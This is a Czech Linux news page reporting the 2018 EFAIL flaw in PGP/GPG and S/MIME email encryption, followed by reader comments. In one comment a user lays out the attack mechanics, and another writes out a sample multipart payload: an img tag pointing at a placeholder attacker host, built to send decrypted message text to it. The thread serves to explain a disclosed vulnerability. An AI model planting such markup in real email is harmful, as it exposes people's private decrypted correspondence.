Přihlášení | Registrace

napište » Zprávičky

Linux 6.9

dnes 09:22 | Nová verze

Po 9 týdnech vývoje od vydání Linuxu 6.8 oznámil Linus Torvalds vydání Linuxu 6.9. Přehled novinek a vylepšení na LWN.net: první a druhá polovina začleňovacího okna. Později také na Linux Kernel Newbies.

Ladislav Hagara | Komentářů: 0

Pingora 0.2.0

11.5. 18:22 | Nová verze

Byla vydána verze 0.2.0 v Rustu napsaného frameworku Pingora pro vytváření rychlých, spolehlivých a programovatelných síťových systémů. Společnost Cloudflare jej letos v únoru uvolnila pod licencí Apache 2.0.

Ladislav Hagara | Komentářů: 0

xrdp 0.10.0

10.5. 19:11 | Nová verze

Open source RDP (Remote Desktop Protocol) server xrdp (Wikipedie) byl vydán ve verzi 0.10.0. Z novinek je vypíchnuta podpora GFX (Graphic Pipeline Extension). Nová větev řeší také několik bezpečnostních chyb.

Ladislav Hagara | Komentářů: 14

Rocky Linux 9.4

10.5. 04:11 | Nová verze

Rocky Linux byl vydán v nové stabilní verzi 9.4. Přehled novinek v poznámkách k vydání.

Ladislav Hagara | Komentářů: 0

Dellu byla odcizena databáze zákazníků

9.5. 22:22 | Bezpečnostní upozornění

Dellu byla odcizena databáze zákazníků (jméno, adresa, seznam zakoupených produktů) [Customer Care, Bleeping Computer].

Ladislav Hagara | Komentářů: 22

Kdy Zed na Linuxu?

9.5. 21:11 | Zajímavý článek

V lednu byl otevřen editor kódů Zed od autorů editoru Atom a Tree-sitter. Tenkrát běžel pouze na macOS. Byl napevno svázán s Metalem. Situace se ale postupně mění. V aktuálním příspěvku Kdy Zed na Linuxu? na blogu Zedu vývojáři popisují aktuální stav. Blíží se alfa verze.

Ladislav Hagara | Komentářů: 59

Maker Faire Prague

9.5. 14:33 | Pozvánky

O víkendu 11. a 12. května lze navštívit Maker Faire Prague, festival plný workshopů, interaktivních činností a především nadšených a zvídavých lidí.

Ladislav Hagara | Komentářů: 0

Fedora Asahi Remix 40

8.5. 21:55 | Nová verze

Byl vydán Fedora Asahi Remix 40, tj. linuxová distribuce pro Apple Silicon vycházející z Fedora Linuxu 40.

Ladislav Hagara | Komentářů: 20

Raspberry Pi Connect

8.5. 20:22 | IT novinky

Představena byla služba Raspberry Pi Connect usnadňující vzdálený grafický přístup k vašim Raspberry Pi z webového prohlížeče. Odkudkoli. Zdarma. Zatím v beta verzi. Detaily v dokumentaci.

Ladislav Hagara | Komentářů: 7

Trinity Desktop Environment (TDE) R14.1.2

8.5. 12:55 | Nová verze

Byla vydána verze R14.1.2 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5). Přehled novinek v poznámkách k vydání, podrobnosti v seznamu změn.

JZD | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Podle hypotézy Mrtvý Internet mj. tvoří většinu online interakcí boti.

Jsem bot. (70%)

Jsem člověk. (7%)

Opravdu jsem člověk! (11%)

Jsem něco jiného. (13%)

Celkem 197 hlasů

Komentářů: 11, poslední 10.5. 18:00

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Zprávičky / Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Štítky: bezpečnost, EFF, GnuPG, chyba, šifrování, vývojář

Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Zítra v 9:00 budou zveřejněny informace o "vážné bezpečnostní chybě" v šifrování pošty pomocí PGP/GPG i S/MIME. EFF (Electronic Frontier Foundation) na svém blogu doporučuje okamžité zakázání automatického dešifrování zpráv nebo raději i odinstalování nástrojů pro dešifrování. Werner Koch, hlavní vývojář GnuPG, i další odborníci považují zprávu za nafouklou bublinu.

14.5.2018 11:22 | Ladislav Hagara | Bezpečnostní upozornění

Tiskni Sdílej:

Komentáře

Nástroje: Začni sledovat (1) ? , Tisk

Vložit další komentář

14.5.2018 11:46 Slavko
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Odpovědět | Sbalit | Link | Blokovat | Admin

Hmm, že by boli CIA, NSA a podobné dobré troj-písmenkové organizácie vážne znepokojené narastajúcim počtom šifrovaných správ?

14.5.2018 12:07 Conscript89 | Brno
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Stejne jako treba FSB, ze? :)

I can only show you the door. You're the one that has to walk through it.

14.5.2018 12:13 Conscript89 | Brno
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Akorat co se tyka v tomto pripade je to co se tyce NSA, CIA spekulace, narozdil od FSB ktera dala primo "pokyn" zakazat telegram.

I can only show you the door. You're the one that has to walk through it.

14.5.2018 15:56 Slavko
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Síce neviem o tom, že by bol akýsi Telegram zakázaný v SR či ČR, ani že by FSB odporúčala okamžite prestať šifrovať, ale inak áno - je to špekulácia, lebo dobré troj-písmenkové organizácie nemajú odvahu urobiť to otvorene, ale získavajú prístup cez nastrčené organizácie, ako napr. súkromné kľúče prostredníctvom metrík Windows...

Mimochodom, i dobré troj-písmenkové organizácie z USA majú podobný prístup zabezpečený ich federálnym zákonom, ale o tom sa taktne mlčí, pretože mlčanie nie je dezinformácia, že... Alebo ste nečítali veci, ktoré vyšli najavo vďaka zlému Snowdenovi?

14.5.2018 21:12 Peter Golis | skóre: 64 | blog: Bežné záležitosti | Bratislava
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

To je ten komunista?

14.5.2018 17:43 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Kdyby tohle objevila NSA, tak si to schová jako 0day a nebude to zveřejňovat.

Já to s tou denacifikací Slovenska myslel vážně.

15.5.2018 10:58 Marián Kyral | skóre: 29 | blog: Sem_Tam | Frýdek-Místek
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

A myslíš, že o tom ještě neví?

14.5.2018 12:08 elenril
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Odpovědět | Sbalit | Link | Blokovat | Admin

Aha, takže v podstatě je to jen "HTML email je zlo a neměl by se používat", ale "security researchers" kolem toho potřebují udělat cirkus.

14.5.2018 14:20 Lyco | skóre: 14 | blog: Lyco
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Odpovědět | Sbalit | Link | Blokovat | Admin

Protože už jsou k dispozici informace, tak přidávám shrnutí:

Je to kombinace několika věcí:

mailové čtečky stahují automaticky vzdálený obsah
některé mailové čtečky neberou ohled na bezpečnostní interakce zašifrovaného a nezašifrovaného obsahu: můžu v plaintextu otevřít tag img, do src vložit zašifrovaný obsah (pomocí MIME multipart) a v plaintextu zase img zavřít. Voila: v logu webserveru najdu rozšifrovaný obsah.
I pokud je klient rozumný, dá se udělat útok na kryptografii: používá se neautentizovaný mód CBC (nebo jeho dvojče, CFB). Útočník, pokud správně uhodne plaintext prvního bloku (a to typicky dokáže), může zkonstruovat blok který se rozšifruje na známou hodnotu. Tím vloží do plaintextu tag img a zbytek nechá normálně rozšifrovat jako výše.

Vysvětlení Odborný článek

Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.

14.5.2018 17:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

TL;DR. ELI5: Vyrobíš multipart zprávu s

<img src="https://útočník/?m=
----BOUNDARY
-----BEGIN PGP MESSAGE-----
...
-----END PGP MESSAGE-----
----BOUNDARY
">

Poštovní klient ten vnitřek rozšifruje, sestaví z toho dokument, a pokud povolíš nahrávání vzdálených obrázků (což lze zařídit třeba tím, že tuhle věc přilepíš do newsletteru z Alzy), tak se GETne ten tajný obsah. Nejspíš to selže pokud v šifrované zprávě budou uvozovky.

Já to s tou denacifikací Slovenska myslel vážně.

14.5.2018 20:20 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Poštovní klient ten vnitřek rozšifruje

Tak to je facepalm.

Intel meltdown a = arr[x[0]&1]; karma | 帮帮我，我被锁在中国房

14.5.2018 21:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Myslíš tím že by klient neměl rozšifrovat zprávu když je jenom částečně šifrovaná? Často totiž nemáš jinou možnost - například různé mailing listy, které přidávají patičky.

Já to s tou denacifikací Slovenska myslel vážně.

15.5.2018 09:54 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

No dovedu si představit, že by přesunul ten šifrovanej obsah do speciální oblasti a izoloval jí od okolí.

Intel meltdown a = arr[x[0]&1]; karma | 帮帮我，我被锁在中国房

15.5.2018 10:01 Josef Kufner | skóre: 70
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

V první řadě je prasárna cpát šifrovaný text do plain-text těla mailu. Pokud se dá do samostatné multipart části, tak konference patičku přihodí jako další textovou část a nic se nerozbije (přijde multipart zpráva s dvěma těly - jedno šifrované a druhé nikoliv).

Hello world ! Segmentation fault (core dumped)

15.5.2018 12:56 Lyco | skóre: 14 | blog: Lyco
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Ta chyba je na efail.de popsaná právě pro multipart maily.

Skutečný problém je v tom, že to klient spojí a interpretuje jako celek, přestože jsou tam hranice (dané šifrováním) které nelze bezpečně překročit.

Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.

14.5.2018 17:53 petr
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

Odpovědět | Sbalit | Link | Blokovat | Admin

at nemusite cekat https://efail.de/efail-attack-paper.pdf

Založit nové vlákno • Nahoru

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje